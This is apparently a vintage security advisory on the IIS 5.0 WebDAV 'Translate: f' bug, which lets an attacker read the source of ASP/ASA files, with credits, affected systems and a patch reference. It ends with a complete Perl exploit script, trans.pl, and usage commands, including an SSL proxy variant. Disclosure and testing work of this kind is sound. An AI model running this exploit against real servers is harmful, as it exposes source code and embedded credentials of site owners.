|
Brought to you by:
Suppliers of:
|
|
|
| |
A vulnerability in IIS allows remote attackers to view the source of offered server side scripts supported by IIS (such as ASP, ASA, HTR, etc.). This vulnerability is very dangerous since a lot of sensitive information is kept in these files, since programmers often rely on the fact that the source code is hidden from the user.
The vulnerability involves sending a special header with 'Translate: f' at the end of it, and then a trailing slash '/' appended to the end of the URL. It cannot be exploited by the standard browsers, but an exploit code below enables to test for this problem. |
| |
Credit:
The information has been provided by SMILER.
The exploit code was provided by Roelof Temmingh.
|
| |
Vulnerable systems:
Microsoft Windows NT 2000 (IIS 5.0)
Windows NT 4.0 with FrontPage Server Extensions 2000
Immune systems:
Microsoft IIS 4.0 and below
WebDAV implemented in Windows 2000 and Office 2000 (including FrontPage 2000 and FrontPage 2000 Server extensions) is the source of Translate:f problem.
When someone makes request for ASP/ASA (or any other scriptable page) and adds "Translate: f" into headers of HTTP GET request (headers are not part of the URL, they are part of the raw HTTP request), there is a serious security bug in Windows 2000 (when unpatched by SP1) that in return gives complete ASP/ASA code instead of processed file. It's necessary to add a trailing slash "/" to end of requested URL to make this work.
"Translate:f" is legitimate header for WebDAV, it is used as it should be - adding this to HTTP GET is a signal for the WebDAV component to return the source code of the requested file and bypass processing. It is used in FrontPage2000 and any WebDAV compatible client to get a file for editing. It has to be accompanied by some other information, which should prevent unauthorized users from viewing the source. Unfortunately, a coding problem makes it possible to retrieve those files by simply adding "Translate:f" in the header, and placing "/" at end of request to the HTTP GET.
It is a Windows 2000 bug, but because of FrontPage Server Extensions 2000 can be installed even on IIS 4.0 sites, it also affectes IIS 4.0. Many IIS 4.0 sites will exhibit the "Translate: f" bug when web files are stored on a shared (network) directory, this vulnerability has been fixed in the past (see our previous article: Patch Available for the Virtualized UNC Share Vulnerability).
Patch:
Microsoft has released the following patch, which eliminates this vulnerability:
Microsoft patch Q256888_W2K_SP1_x86_en
Exploit:
Typical usage:
$ perl trans.pl www.example.com login.asp 80
To use against SSL sites:
1) $ sslproxy -L 127.0.0.1 -l 7555 -R www.example.com -r 443 -v Class3.pem
2) $ perl trans.pl 127.0.0.1 login.asp 7555
---cut: trans.pl---
#!/usr/bin/perl
use Socket;
####test arguments
if ($#ARGV != 2) {die "usage: DNS_name/IP file_to_get port\n";}
#####load values
$host = @ARGV[0];$port = @ARGV[2];$target = inet_aton($host);$toget= @ARGV[1];
#####build request
$xtosend=<<EOT
GET /$toget\\ HTTP/1.0
Host: $host
User-Agent: SensePostData
Content-Type: application/x-www-form-urlencoded
Translate: f
EOT
;
$xtosend=~s/\n/\r\n/g;
####send request
#print $xtosend;
my @results=sendraw($xtosend);
print @results;
#### Sendraw - thanx RFP rfp@wiretrip.net
sub sendraw { # this saves the whole transaction anyway
my ($pstr)=@_;
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
die("Socket problems\n");
if(connect(S,pack "SnA4x8",2,$port,$target)){
my @in;
select(S); $|=1; print $pstr;
while(<S>){ push @in, $_;
print STDOUT "." if(defined $args{X});}
select(STDOUT); close(S); return @in;
} else { die("Can't connect...\n"); }
}
---cut----
|
|
|
|
|
